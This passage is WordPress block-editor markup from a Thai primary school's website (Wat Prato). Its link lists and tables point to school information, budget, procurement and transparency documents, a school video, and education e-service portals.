gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 